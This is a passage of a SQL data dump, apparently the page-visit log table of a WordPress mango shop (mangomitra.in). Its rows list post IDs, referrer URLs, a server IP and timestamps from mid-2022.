12:42:26'),(1488,0,0,1,1132,21,'','3.110.242.160','','','','2022-06-22 19:54:24'),(1489,0,0,1,1114,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:03'),(1490,0,0,1,1116,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:04'),(1491,0,0,1,1097,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:06'),(1492,0,0,1,1263,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:17'),(1493,0,0,1,1287,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:19'),(1494,0,0,1,1288,21,'https://www.google.com','3.110.242.160','','','','2022-06-23 04:20:20'),(1495,0,0,1,1138,21,'','3.110.242.160','','','','2022-06-26 11:37:15'),(1496,0,0,1,1289,21,'','3.110.242.160','','','','2022-06-26 22:32:25'),(1497,0,0,1,1165,21,'','3.110.242.160','','','','2022-06-27 09:33:22'),(1498,0,0,1,1287,21,'','3.110.242.160','','','','2022-06-30 09:07:00'),(1499,0,0,1,1289,21,'','3.110.242.160','','','','2022-06-30 09:07:15'),(1500,9,0,0,130,1,'','3.110.242.160','','','','2022-06-30 09:07:18'),(1501,0,0,1,1116,21,'','3.110.242.160','','','','2022-06-30 09:18:32'),(1502,0,0,1,1093,21,'https://www.google.co.in/','3.110.242.160','','','','2022-07-01 08:07:03'),(1503,0,0,1,1288,21,'','3.110.242.160','','','','2022-07-01 11:18:05'),(1504,0,0,1,1263,21,'','3.110.242.160','','','','2022-07-01 12:13:28'),(1505,0,0,1,1100,21,'','3.110.242.160','','','','2022-07-01 13:34:15'),(1506,0,0,1,1287,21,'','3.110.242.160','','','','2022-07-01 15:30:36'),(1507,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-01 18:41:52'),(1508,0,0,1,1264,21,'','3.110.242.160','','','','2022-07-01 19:57:26'),(1509,0,0,1,1084,21,'','3.110.242.160','','','','2022-07-01 23:45:08'),(1510,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-02 00:24:58'),(1511,0,0,1,1137,21,'','3.110.242.160','','','','2022-07-02 02:50:58'),(1512,0,0,1,1132,21,'','3.110.242.160','','','','2022-07-04 10:18:55'),(1513,0,0,1,1122,21,'','3.110.242.160','','','','2022-07-05 01:38:05'),(1514,0,0,1,1093,21,'https://www.google.com/','3.110.242.160','','','','2022-07-05 15:11:56'),(1515,1,0,0,0,21,'','3.110.242.160','','','','2022-07-05 22:34:46'),(1516,0,0,1,1069,21,'https://mangomitra.in/product/appemidi-5kg','3.110.242.160','','','','2022-07-05 22:34:56'),(1517,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-07-06 04:34:14'),(1518,9,0,0,130,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-07-06 04:35:57'),(1519,0,0,1,1287,21,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-07-06 04:36:19'),(1520,0,0,1,1093,21,'https://www.google.com/','3.110.242.160','','','','2022-07-06 15:34:01'),(1521,0,0,1,1161,21,'','3.110.242.160','','','','2022-07-06 18:12:29'),(1522,1,0,0,0,21,'','3.110.242.160','','','','2022-07-07 05:54:28'),(1523,1,0,0,0,21,'','3.110.242.160','','','','2022-07-08 11:58:46'),(1524,9,0,0,35,1,'','3.110.242.160','','','','2022-07-08 12:34:47'),(1525,9,0,0,36,1,'','3.110.242.160','','','','2022-07-08 12:37:32'),(1526,9,0,0,77,1,'','3.110.242.160','','','','2022-07-08 12:53:05'),(1527,9,0,0,130,1,'','3.110.242.160','','','','2022-07-08 13:02:51'),(1528,9,0,0,37,1,'','3.110.242.160','','','','2022-07-08 13:10:23'),(1529,9,0,0,38,1,'','3.110.242.160','','','','2022-07-08 13:12:38'),(1530,1,0,0,0,21,'','3.110.242.160','','','','2022-07-08 16:48:44'),(1531,0,0,1,1114,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:17'),(1532,0,0,1,1116,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:19'),(1533,0,0,1,1097,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:20'),(1534,0,0,1,1263,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:22'),(1535,0,0,1,1287,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:23'),(1536,0,0,1,1288,21,'https://www.google.com','3.110.242.160','','','','2022-07-09 20:28:24'),(1537,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-09 23:23:18'),(1538,0,0,1,1288,21,'','3.110.242.160','','','','2022-07-10 16:40:42'),(1539,9,0,0,130,1,'','3.110.242.160','','','','2022-07-11 04:15:42'),(1540,9,0,0,35,1,'','3.110.242.160','','','','2022-07-11 04:15:43'),(1541,9,0,0,36,1,'','3.110.242.160','','','','2022-07-11 04:15:44'),(1542,9,0,0,37,1,'','3.110.242.160','','','','2022-07-11 04:15:45'),(1543,9,0,0,38,1,'','3.110.242.160','','','','2022-07-11 04:15:47'),(1544,9,0,0,77,1,'','3.110.242.160','','','','2022-07-11 04:15:48'),(1545,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-11 04:15:50'),(1546,0,0,1,1288,21,'','3.110.242.160','','','','2022-07-11 04:15:51'),(1547,0,0,1,1287,21,'','3.110.242.160','','','','2022-07-11 04:15:52'),(1548,9,0,0,77,1,'','3.110.242.160','','','','2022-07-12 11:10:04'),(1549,1,0,0,0,21,'','3.110.242.160','','','','2022-07-12 14:46:29'),(1550,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:43:50'),(1551,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:19'),(1552,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:25'),(1553,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:32'),(1554,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:35'),(1555,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:40'),(1556,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:44'),(1557,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:49'),(1558,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:53'),(1559,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-13 15:44:58'),(1560,0,0,1,1165,21,'','3.110.242.160','','','','2022-07-14 18:20:40'),(1561,9,0,0,85,1,'','3.110.242.160','','','','2022-07-14 23:12:35'),(1562,0,0,1,1144,21,'','3.110.242.160','','','','2022-07-15 01:38:06'),(1563,0,0,1,1167,21,'','3.110.242.160','','','','2022-07-15 17:02:10'),(1564,0,0,1,1169,21,'','3.110.242.160','','','','2022-07-18 03:40:01'),(1565,0,0,1,1263,21,'','3.110.242.160','','','','2022-07-18 05:45:04'),(1566,9,0,0,36,1,'','3.110.242.160','','','','2022-07-18 07:25:49'),(1567,0,0,1,1159,21,'','3.110.242.160','','','','2022-07-18 07:42:32'),(1568,0,0,1,1125,21,'','3.110.242.160','','','','2022-07-18 09:16:08'),(1569,0,0,1,1111,21,'','3.110.242.160','','','','2022-07-18 10:58:21'),(1570,0,0,1,1138,21,'','3.110.242.160','','','','2022-07-18 11:38:04'),(1571,0,0,1,1167,21,'','3.110.242.160','','','','2022-07-18 12:24:10'),(1572,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-18 12:27:15'),(1573,0,0,1,1287,21,'','3.110.242.160','','','','2022-07-18 12:58:27'),(1574,0,0,1,1119,21,'','3.110.242.160','','','','2022-07-18 13:57:21'),(1575,0,0,1,1120,21,'','3.110.242.160','','','','2022-07-18 14:03:34'),(1576,9,0,0,35,1,'','3.110.242.160','','','','2022-07-18 14:59:53'),(1577,0,0,1,1069,21,'','3.110.242.160','','','','2022-07-18 15:16:38'),(1578,0,0,1,1288,21,'','3.110.242.160','','','','2022-07-18 15:48:53'),(1579,0,0,1,1135,21,'','3.110.242.160','','','','2022-07-18 16:00:29'),(1580,0,0,1,1093,21,'','3.110.242.160','','','','2022-07-18 16:51:26'),(1581,0,0,1,1097,21,'','3.110.242.160','','','','2022-07-18 17:51:13'),(1582,0,0,1,1134,21,'','3.110.242.160','','','','2022-07-18 18:01:37'),(1583,9,0,0,38,1,'','3.110.242.160','','','','2022-07-18 18:05:50'),(1584,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-18 18:12:52'),(1585,0,0,1,1161,21,'','3.110.242.160','','','','2022-07-18 18:20:05'),(1586,0,0,1,1128,21,'','3.110.242.160','','','','2022-07-18 18:44:34'),(1587,9,0,0,129,1,'','3.110.242.160','','','','2022-07-18 19:09:39'),(1588,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-07-19 19:03:54'),(1589,0,0,1,1159,21,'','3.110.242.160','','','','2022-07-20 05:28:11'),(1590,0,0,1,1091,21,'','3.110.242.160','','','','2022-07-21 18:41:46'),(1591,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-26 21:03:47'),(1592,0,0,1,1287,21,'','3.110.242.160','','','','2022-07-27 20:39:20'),(1593,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-27 20:39:34'),(1594,9,0,0,130,1,'','3.110.242.160','','','','2022-07-27 20:39:38'),(1595,0,0,1,1170,21,'','3.110.242.160','','','','2022-07-28 00:05:45'),(1596,0,0,1,1122,21,'','3.110.242.160','','','','2022-07-28 00:05:49'),(1597,9,0,0,128,1,'','3.110.242.160','','','','2022-07-28 00:05:50'),(1598,0,0,1,1109,21,'','3.110.242.160','','','','2022-07-28 00:05:52'),(1599,0,0,1,1264,21,'','3.110.242.160','','','','2022-07-28 00:05:53'),(1600,0,0,1,1123,21,'','3.110.242.160','','','','2022-07-28 00:05:54'),(1601,1,0,0,0,21,'','3.110.242.160','','','','2022-07-28 00:05:55'),(1602,9,0,0,85,1,'','3.110.242.160','','','','2022-07-28 00:05:56'),(1603,0,0,1,1137,21,'','3.110.242.160','','','','2022-07-28 00:05:57'),(1604,9,0,0,36,1,'','3.110.242.160','','','','2022-07-28 00:06:00'),(1605,0,0,1,1120,21,'','3.110.242.160','','','','2022-07-28 00:06:02'),(1606,0,0,1,1117,21,'','3.110.242.160','','','','2022-07-28 00:06:04'),(1607,0,0,1,1138,21,'','3.110.242.160','','','','2022-07-28 00:06:05'),(1608,0,0,1,1132,21,'','3.110.242.160','','','','2022-07-28 00:06:06'),(1609,0,0,1,1125,21,'','3.110.242.160','','','','2022-07-28 00:06:07'),(1610,0,0,1,1126,21,'','3.110.242.160','','','','2022-07-28 00:06:08'),(1611,0,0,1,1111,21,'','3.110.242.160','','','','2022-07-28 00:06:10'),(1612,0,0,1,1159,21,'','3.110.242.160','','','','2022-07-28 00:06:11'),(1613,0,0,1,1128,21,'','3.110.242.160','','','','2022-07-28 00:06:12'),(1614,0,0,1,1129,21,'','3.110.242.160','','','','2022-07-28 00:06:15'),(1615,0,0,1,1167,21,'','3.110.242.160','','','','2022-07-28 00:06:16'),(1616,0,0,1,1161,21,'','3.110.242.160','','','','2022-07-28 00:06:18'),(1617,9,0,0,77,1,'','3.110.242.160','','','','2022-07-28 00:06:21'),(1618,9,0,0,130,1,'','3.110.242.160','','','','2022-07-28 00:06:22'),(1619,0,0,1,1119,21,'','3.110.242.160','','','','2022-07-28 00:06:23'),(1620,9,0,0,38,1,'','3.110.242.160','','','','2022-07-28 00:06:25'),(1621,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-28 00:06:26'),(1622,0,0,1,1289,21,'','3.110.242.160','','','','2022-07-28 00:06:28'),(1623,9,0,0,35,1,'','3.110.242.160','','','','2022-07-28 00:06:30'),(1624,0,0,1,1114,21,'','3.110.242.160','','','','2022-07-28 00:06:31'),(1625,0,0,1,1091,21,'','3.110.242.160','','','','2022-07-28 00:06:32'),(1626,0,0,1,1102,21,'','3.110.242.160','','','','2022-07-28 00:06:34'),(1627,0,0,1,1116,21,'','3.110.242.160','','','','2022-07-28 00:06:36'),(1628,0,0,1,1169,21,'','3.110.242.160','','','','2022-07-28 00:06:37'),(1629,0,0,1,1163,21,'','3.110.242.160','','','','2022-07-28 00:06:38'),(1630,9,0,0,127,1,'','3.110.242.160','','','','2022-07-28 00:06:42'),(1631,9,0,0,129,1,'','3.110.242.160','','','','2022-07-28 00:06:43'),(1632,0,0,1,1288,21,'','3.110.242.160','','','','2022-07-28 00:06:44'),(1633,9,0,0,37,1,'','3.110.242.160','','','','2022-07-28 00:06:47'),(1634,0,0,1,1134,21,'','3.110.242.160','','','','2022-07-28 00:06:48'),(1635,0,0,1,1263,21,'','3.110.242.160','','','','2022-07-28 00:06:49'),(1636,0,0,1,1135,21,'','3.110.242.160','','','','2022-07-28 00:06:50'),(1637,0,0,1,1145,21,'','3.110.242.160','','','','2022-07-28 01:17:21'),(1638,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 01:17:25'),(1639,0,0,1,1082,21,'','3.110.242.160','','','','2022-07-28 01:17:28'),(1640,9,0,0,35,1,'','3.110.242.160','','','','2022-07-28 01:17:31'),(1641,0,0,1,1086,21,'','3.110.242.160','','','','2022-07-28 01:17:33'),(1642,0,0,1,1087,21,'','3.110.242.160','','','','2022-07-28 01:17:36'),(1643,0,0,1,1088,21,'','3.110.242.160','','','','2022-07-28 01:17:40'),(1644,0,0,1,1089,21,'','3.110.242.160','','','','2022-07-28 01:17:44'),(1645,1,0,0,0,21,'','3.110.242.160','','','','2022-07-28 01:17:50'),(1646,0,0,1,1165,21,'','3.110.242.160','','','','2022-07-28 01:17:53'),(1647,0,0,1,1092,21,'','3.110.242.160','','','','2022-07-28 01:17:58'),(1648,0,0,1,1069,21,'','3.110.242.160','','','','2022-07-28 01:18:01'),(1649,0,0,1,1083,21,'','3.110.242.160','','','','2022-07-28 01:18:03'),(1650,0,0,1,1100,21,'','3.110.242.160','','','','2022-07-28 01:18:05'),(1651,0,0,1,1146,21,'','3.110.242.160','','','','2022-07-28 01:18:07'),(1652,0,0,1,1084,21,'','3.110.242.160','','','','2022-07-28 01:18:09'),(1653,0,0,1,1141,21,'','3.110.242.160','','','','2022-07-28 01:18:13'),(1654,0,0,1,1095,21,'','3.110.242.160','','','','2022-07-28 01:18:16'),(1655,9,0,0,35,1,'','3.110.242.160','','','','2022-07-28 01:18:18'),(1656,0,0,1,1140,21,'','3.110.242.160','','','','2022-07-28 01:18:20'),(1657,1,0,0,0,21,'','3.110.242.160','','','','2022-07-28 01:18:23'),(1658,1,0,0,0,21,'','3.110.242.160','','','','2022-07-28 01:18:25'),(1659,0,0,1,1107,21,'','3.110.242.160','','','','2022-07-28 01:18:28'),(1660,0,0,1,1144,21,'','3.110.242.160','','','','2022-07-28 01:18:30'),(1661,0,0,1,1143,21,'','3.110.242.160','','','','2022-07-28 01:18:31'),(1662,0,0,1,1085,21,'','3.110.242.160','','','','2022-07-28 01:18:33'),(1663,0,0,1,1093,21,'','3.110.242.160','','','','2022-07-28 01:18:35'),(1664,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-28 04:48:36'),(1665,1,0,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:34'),(1666,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:37'),(1667,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:38'),(1668,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:40'),(1669,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:44'),(1670,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:46'),(1671,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:49'),(1672,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:50'),(1673,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:53'),(1674,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:08:55'),(1675,9,0,0,35,1,'','3.110.242.160','','','','2022-07-28 05:08:59'),(1676,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:09:01'),(1677,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:09:03'),(1678,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 05:09:04'),(1679,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 11:55:49'),(1680,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 11:55:50'),(1681,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 11:55:53'),(1682,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 11:55:54'),(1683,0,1,0,0,21,'','3.110.242.160','','','','2022-07-28 13:59:53'),(1684,0,0,1,1117,21,'','3.110.242.160','','','','2022-07-29 04:16:10'),(1685,0,0,1,1264,21,'','3.110.242.160','','','','2022-07-29 19:54:47'),(1686,0,0,1,1131,21,'','3.110.242.160','','','','2022-07-30 17:22:24'),(1687,1,0,0,0,21,'','3.110.242.160','','','','2022-07-30 22:02:36'),(1688,0,0,1,1135,21,'','3.110.242.160','','','','2022-07-31 00:05:34'),(1689,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-07-31 01:34:50'),(1690,9,0,0,129,1,'','3.110.242.160','','','','2022-07-31 04:05:44'),(1691,9,0,0,85,1,'','3.110.242.160','','','','2022-07-31 15:51:38'),(1692,0,0,1,1137,21,'','3.110.242.160','','','','2022-07-31 23:49:25'),(1693,9,0,0,127,1,'','3.110.242.160','','','','2022-08-01 00:27:45'),(1694,9,0,0,128,1,'','3.110.242.160','','','','2022-08-01 00:27:45'),(1695,9,0,0,129,1,'','3.110.242.160','','','','2022-08-01 00:27:53'),(1696,9,0,0,130,1,'','3.110.242.160','','','','2022-08-01 00:28:20'),(1697,9,0,0,38,1,'','3.110.242.160','','','','2022-08-01 00:28:23'),(1698,9,0,0,77,1,'','3.110.242.160','','','','2022-08-01 00:28:24'),(1699,9,0,0,35,1,'','3.110.242.160','','','','2022-08-01 00:28:25'),(1700,9,0,0,37,1,'','3.110.242.160','','','','2022-08-01 00:28:27'),(1701,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-01 01:04:28'),(1702,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-01 02:30:20'),(1703,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-01 05:20:04'),(1704,9,0,0,36,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-08-01 05:20:22'),(1705,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-01 10:25:54'),(1706,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-01 14:06:51'),(1707,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-08-01 17:40:33'),(1708,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-01 21:12:15'),(1709,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-02 05:32:54'),(1710,0,0,1,1084,21,'','3.110.242.160','','','','2022-08-02 19:28:37'),(1711,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-02 21:01:34'),(1712,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-02 22:13:15'),(1713,0,0,1,1163,21,'','3.110.242.160','','','','2022-08-03 11:25:44'),(1714,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-04 21:47:39'),(1715,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-05 02:15:27'),(1716,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-05 02:20:33'),(1717,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-05 03:57:25'),(1718,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-05 20:07:48'),(1719,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-05 20:10:59'),(1720,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-05 20:13:38'),(1721,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-05 20:14:05'),(1722,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-05 21:21:41'),(1723,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-06 01:23:48'),(1724,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-06 01:27:45'),(1725,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-06 01:44:28'),(1726,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-06 01:49:58'),(1727,0,0,1,1085,21,'','3.110.242.160','','','','2022-08-06 05:46:23'),(1728,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-07 00:01:20'),(1729,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-07 11:38:50'),(1730,0,0,1,1084,21,'','3.110.242.160','','','','2022-08-07 15:04:55'),(1731,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:11'),(1732,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:29'),(1733,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:33'),(1734,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:37'),(1735,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:39'),(1736,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:41'),(1737,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:43'),(1738,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:45'),(1739,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:46'),(1740,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:48'),(1741,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:53'),(1742,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:05:57'),(1743,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:02'),(1744,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:08'),(1745,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:13'),(1746,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:18'),(1747,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:24'),(1748,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:29'),(1749,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:34'),(1750,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:36'),(1751,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:38'),(1752,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:40'),(1753,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:42'),(1754,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:44'),(1755,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:46'),(1756,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:48'),(1757,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:49'),(1758,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:51'),(1759,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:53'),(1760,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:55'),(1761,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-07 23:06:57'),(1762,9,0,0,128,1,'','3.110.242.160','','','','2022-08-08 13:18:04'),(1763,9,0,0,37,1,'','3.110.242.160','','','','2022-08-08 15:29:00'),(1764,0,0,1,1084,21,'','3.110.242.160','','','','2022-08-08 16:02:42'),(1765,9,0,0,36,1,'','3.110.242.160','','','','2022-08-08 17:26:42'),(1766,1,0,0,0,21,'','3.110.242.160','','','','2022-08-08 18:22:19'),(1767,1,0,0,0,21,'','3.110.242.160','','','','2022-08-09 17:11:17'),(1768,0,0,1,1069,21,'https://mangomitra.in/product/appemidi-5kg','3.110.242.160','','','','2022-08-09 17:11:26'),(1769,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-10 11:29:20'),(1770,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-10 18:25:32'),(1771,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-10 19:08:25'),(1772,9,0,0,130,1,'','3.110.242.160','','','','2022-08-11 07:33:40'),(1773,9,0,0,35,1,'','3.110.242.160','','','','2022-08-11 07:33:41'),(1774,9,0,0,36,1,'','3.110.242.160','','','','2022-08-11 07:33:43'),(1775,9,0,0,37,1,'','3.110.242.160','','','','2022-08-11 07:33:44'),(1776,9,0,0,38,1,'','3.110.242.160','','','','2022-08-11 07:33:45'),(1777,9,0,0,77,1,'','3.110.242.160','','','','2022-08-11 07:33:46'),(1778,0,0,1,1288,21,'','3.110.242.160','','','','2022-08-11 07:33:48'),(1779,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-11 07:33:49'),(1780,0,0,1,1289,21,'','3.110.242.160','','','','2022-08-11 07:33:51'),(1781,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-12 01:48:33'),(1782,0,0,1,1134,21,'https://mangomitra.in/product/himasagar-mango-3kg','3.110.242.160','','','','2022-08-12 18:53:57'),(1783,0,0,1,1159,21,'https://mangomitra.in/product/mango-solapur-pickle','3.110.242.160','','','','2022-08-12 18:53:57'),(1784,0,0,1,1117,21,'https://mangomitra.in/product/tropicana-slice-fruit-drink-tetrapack-1-2l','3.110.242.160','','','','2022-08-12 18:53:57'),(1785,0,0,1,1165,21,'https://mangomitra.in/product/chhunda-or-gujarati-sweet-mango-pickle-250gm','3.110.242.160','','','','2022-08-12 18:53:57'),(1786,1,0,0,0,21,'https://mangomitra.in/shop','3.110.242.160','','','','2022-08-12 18:53:57'),(1787,1,0,0,0,21,'','3.110.242.160','','','','2022-08-13 03:53:26'),(1788,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:17:59'),(1789,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:30:36'),(1790,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:30:47'),(1791,9,0,0,129,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:40:36'),(1792,0,0,1,1069,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:40:48'),(1793,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:41:13'),(1794,0,0,1,1125,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:41:22'),(1795,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:41:30'),(1796,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:41:38'),(1797,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:55:07'),(1798,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:55:19'),(1799,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:55:32'),(1800,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:55:43'),(1801,0,0,1,1137,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:55:53'),(1802,0,0,1,1138,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:56:01'),(1803,0,0,1,1093,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:56:20'),(1804,0,0,1,1131,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:56:33'),(1805,0,0,1,1132,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:56:43'),(1806,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 18:56:54'),(1807,0,0,1,1129,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:28:25'),(1808,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:28:32'),(1809,0,0,1,1134,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:28:39'),(1810,0,0,1,1135,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:28:46'),(1811,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:28:53'),(1812,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:29:00'),(1813,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:29:08'),(1814,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:29:15'),(1815,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:29:22'),(1816,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:45:03'),(1817,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:45:14'),(1818,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:45:23'),(1819,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 